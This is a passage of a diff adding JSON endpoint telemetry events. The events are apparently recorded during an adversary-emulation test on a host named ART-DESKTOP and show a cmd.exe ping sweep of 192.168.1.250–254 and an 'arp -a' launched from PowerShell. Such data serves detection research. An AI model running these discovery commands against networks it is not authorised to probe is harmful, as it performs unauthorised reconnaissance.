+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7624, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "process", + 
"pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573212290000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.250", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573212510000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + 
"unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212610000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "process", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573216840000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.251", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": 
"{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "process", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573221830000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.252", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3648, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "process", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573226840000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.253", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "process", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573227290000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.254", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4220, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573227530000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4220, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "process", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573231990000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "process", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573231990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": 
"process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7784, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573232160000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", 
+ "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "process", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "file", + "file_name": "CMD.EXE-89305D47.pf", + "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"arp -a\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + 